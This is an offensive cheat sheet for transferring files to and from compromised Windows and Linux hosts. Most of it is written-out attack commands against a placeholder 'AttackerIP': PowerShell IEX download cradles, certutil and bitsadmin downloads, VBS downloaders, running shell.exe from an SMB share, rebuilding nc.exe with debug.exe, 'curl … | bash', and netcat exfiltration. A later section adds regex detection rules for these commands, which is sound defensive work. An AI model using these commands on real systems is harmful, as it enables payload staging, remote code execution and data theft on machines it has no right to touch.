File Transfer Cheat Sheet

File transfer cheat sheet for Windows and Linux operating systems.

Serving Files For Transfer

The two main methods I use for serving files over HTTP are either via Apache, or the Python SimpleHTTPServer module.

To serve a file over Apache, copy the file into /var/www/html and start the Apache service.
Apache is installed by default in Kali:

root@kali:~/# cp file /var/www/html
root@kali:~/# service apache2 start  
// Apache is now ready to start serving files for transfer requests. 


My favourite option is to start a Python webserver within my current working directory:

root@kali:~/# python -m SimpleHTTPServer 80  
// This will serve on port 80.  
// Alternative ports can be specified. 


Windows File Transfers


TFTP


TFTP client is installed by default on Windows machines up to Windows 2003. In Windows 7, Windows 2008, and above, this tool would have to be specifically added during installation.

root@kali:~# mkdir /tftp 
root@kali:~# atftpd --daemon --port 69 /tftp  // atftpd is a pre-installed TFTP server in Kali.
root@kali:~# cp file /tftp/ 
// Compromised Windows host
C:> tftp -i AttackerIP get file


FTP


It is possible to install a full-featured FTP server like vsftpd in Kali, but I find it far easier to run a simple FTP server using Python.

The pyftpdlib library, similar to the HTTP one mentioned earlier, allows you to start an FTP server within your current working directory. Anonymous authentication is also accepted.

root@kali:~# apt-get install python-pyftpdlib 
root@kali:~# python -m pyftpdlib -p 21   


With the server up and running, we can transfer files interactively or non-interactively:

//Interactive
C:> ftp AttackerIP
Connected to AttackerIP
User: anonymous 
Password: anonymous
...
ftp> binary 
ftp> get shell.exe
//Non-Interactive
C:> echo open AttackerIP > c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo binary >> c:\ftp.txt
C:> echo get shell.exe >> c:\ftp.txt
C:> echo bye >> c:\ftp.txt
C:> ftp -s:C:\ftp.txt


SMB


smbserver.py from the Impacket project can be used to launch a nice, simple SMB server on port 445.
All that’s needed is for you to specify a share name and the path to the directory containing your file.

root@kali:/impacket/examples# python smbserver.py transfer_share /root/shells

// We can then check that our SMB share is up and running from our compromised Windows host
C:> net view \\AttackerIP   // Our designated share name should be visible in the output

// Windows commands like dir and copy can also be used
C:> dir \\AttackerIP\transfer_share
C:> copy \\AttackerIP\transfer_share\shell.exe

//Executing shell.exe on compromised Windows host via our SMB share ~ transfer_share
C:> \\AttackerIP\transfer_share\shell.exe   


PowerShell


// Within PowerShell
PS:> Invoke-WebRequest -Uri "http://AttackerIP/file" -OutFile "C:\path\to\file"

// Outside PowerShell
C:> powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://AttackerIP/file')

// Non-Interactive PowerShell script
C:> echo $storageDir = $pwd > wget.ps1
C:> echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
C:> echo $url = "http://AttackerIP/file" >>wget.ps1 
C:> echo $file = "file" >>wget.ps1 
C:> echo $webclient.DownloadFile($url,$file) >>wget.ps1 
C:> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1


OpenSSL


// Generate keys
root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

// Serve the file on kali
root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file

// Execute on Windows box to transfer file to C:\file
C:\path\to\openssl.exe s_client -quiet -connect AttackerIP:1234 > C:\file


certutil


C:> certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file


bitsadmin


C:> bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file


Visual Basic Script (VBS)


// Option 1:
// Paste each line separately into Windows shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs 
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 
echo  Err.Clear >> wget.vbs 
echo  Set http = Nothing >> wget.vbs 
echo  Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 
echo  http.Open "GET", strURL, False >> wget.vbs 
echo  http.Send >> wget.vbs 
echo  varByteArray = http.ResponseBody >> wget.vbs 
echo  Set http = Nothing >> wget.vbs 
echo  Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 
echo  Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 
echo  strData = "" >> wget.vbs 
echo  strBuffer = "" >> wget.vbs 
echo  For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 
echo  ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 
echo  Next >> wget.vbs 
echo  ts.Close >> wget.vbs

C:> cscript wget.vbs http://AttackerIP/file file   // Second argument is the local output file name


// Option 2:
// Change AttackerIP && SaveToFile location 
C:> echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://AttackerIP/file", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\file":objADOStream.Close > transfer.vbs

C:> cscript transfer.vbs


debug.exe


The debug.exe program acts as an assembler, disassembler, and a hex dumping tool. We’re able to take binaries like netcat ~ nc.exe and disassemble them into hex.

A series of non-interactive echo commands will write out the binary file into its hex representation.

We can then use debug.exe to assemble the hex file into the original binary file nc.exe on the compromised host. There is a 64k size limit for transferable files.

root@kali:~# ls -l nc.exe 
-rwxr-xr-x 1 root root 59392 nc.exe


This is close to our limit. We can use upx ~ (executable packer) to compress it further:

root@kali:~# upx -9 nc.exe   
...
root@kali:~# ls -l nc.exe 
-rwxr-xr-x 1 root root 29184 nc.exe 


The file size is now more suitable for transfer and has been decreased in size by almost 50%.

We can now convert the nc.exe file into a text file usable by debug.exe on our compromised Windows host. The tool we’ll be using is exe2bat.exe

root@kali:~# cp /usr/share/windows-binaries/exe2bat.exe . // Copy exe2bat.exe into our current working directory
root@kali:~# wine exe2bat.exe nc.exe nc.txt


This will produce an nc.txt file that we can simply copy and paste into the remote Windows shell, and nc.exe will be automatically created on the compromised host.
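
From the defender's side, the Windows transfer commands above all show up in process-creation logs (for example Sysmon Event ID 1, or Security event 4688 with command-line auditing). The following is an added example, not part of the original cheat sheet, that flags them; the log records, rule names and the 192.0.2.10 address are constructed for illustration.

```python
import re

# Constructed process-creation records: timestamp, host, command line.
# 192.0.2.10 is a documentation-range placeholder for the remote server.
SAMPLE_LOG = r"""
2024-05-01T09:12:03Z WS01 certutil -urlcache -split -f http://192.0.2.10/file C:\Users\Public\file
2024-05-01T09:12:40Z WS01 certutil -hashfile C:\Users\Public\file SHA256
2024-05-01T09:13:05Z WS02 bitsadmin /rawreturn /transfer getpayload http://192.0.2.10/file c:\temp\file
2024-05-01T09:14:11Z WS02 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
2024-05-01T09:15:27Z WS03 powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/file')
2024-05-01T09:16:02Z WS03 powershell.exe -Command Get-Service
2024-05-01T09:17:45Z WS04 ftp -s:C:\ftp.txt
2024-05-01T09:18:09Z WS04 tftp -i 192.0.2.10 get file
2024-05-01T09:19:30Z WS05 cscript wget.vbs http://192.0.2.10/file file
2024-05-01T09:20:00Z WS05 \\192.0.2.10\transfer_share\shell.exe
""".strip().splitlines()

# Hypothetical rule names; each regex targets one transfer command from this page.
RULES = {name: re.compile(rx, re.I) for name, rx in {
    "tftp_get": r"\btftp(\.exe)?\s+-i\s+\S+\s+get\b",
    "ftp_script_file": r"\bftp(\.exe)?\s.*-s:",
    "certutil_urlcache": r"\bcertutil(\.exe)?\s.*-urlcache\b.*https?://",
    "bitsadmin_transfer": r"\bbitsadmin(\.exe)?\s.*/transfer\b.*https?://",
    "powershell_download": r"\bpowershell(\.exe)?\s.*(downloadstring|downloadfile|invoke-webrequest)",
    "powershell_ep_bypass": r"\bpowershell(\.exe)?\s.*-executionpolicy\s+bypass",
    "script_host_url": r"\b[cw]script(\.exe)?\s.*\.vbs\b.*https?://",
    "exe_from_unc_path": r"^\\\\[^\\\s]+\\[^\\\s]+\\[^\\\s]+\.exe\b",
}.items()}
# Remote endpoint in a URL, a UNC path, or a tftp -i argument.
ENDPOINT = re.compile(r"(?:https?://|\\\\|\btftp(?:\.exe)?\s+-i\s+)([\w.-]+)", re.I)

def scan(lines):
    """Return (host, matched rule names, command line) for each flagged record."""
    hits = []
    for line in lines:
        _ts, host, cmdline = line.split(" ", 2)
        matched = [name for name, rx in RULES.items() if rx.search(cmdline)]
        if matched:
            hits.append((host, matched, cmdline))
    return hits

def remote_endpoints(hits):
    """Collect the servers contacted by flagged commands, for pivoting in other logs."""
    return {ep for _h, _r, cmd in hits for ep in ENDPOINT.findall(cmd)}

if __name__ == "__main__":
    for host, rules, cmd in scan(SAMPLE_LOG):
        print(host, ",".join(rules), "|", cmd)
```

The two benign records (certutil -hashfile and a plain Get-Service call) pass through unflagged, which is the property to preserve when tuning these patterns against real telemetry.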


Linux File Transfers


wget


wget http://AttackerIP/file -O /var/tmp/file    


curl


curl http://AttackerIP/file --output /var/tmp/file

curl AttackerIP/linenum.sh | bash                 


netcat


root@kali:~# nc -nlvp 1234 > file    // Start listener on Kali and write the received data to file

cat file | nc AttackerIP 1234          // Cat the file and pipe to our nc connection


fetch (FreeBSD)


fetch -o /var/tmp/file "http://AttackerIP/file"   


Python


vim download.py:

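#!/usr/bin/python 
# Python 2 script (urllib2 does not exist in Python 3)
import urllib2 

# Fetch the file over HTTP and write it out in binary mode so executables are not corrupted
u = urllib2.urlopen('http://AttackerIP/file') 
localFile = open('local_file', 'wb') 
localFile.write(u.read()) 
localFile.close()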

$ chmod +x download.py  // Grant executable permission
$ python download.py   // Run on compromised Linux host


OpenSSL


Generate keys

root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes


Serve the file on kali

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file


Execute on Linux host to GET the file

$ openssl s_client -quiet -connect AttackerIP:1234 > file


socat


socat TCP4-LISTEN:8000,fork file:<file to transfer>  // server

socat TCP4:<ip>:8000 file:<file to get>,create   // client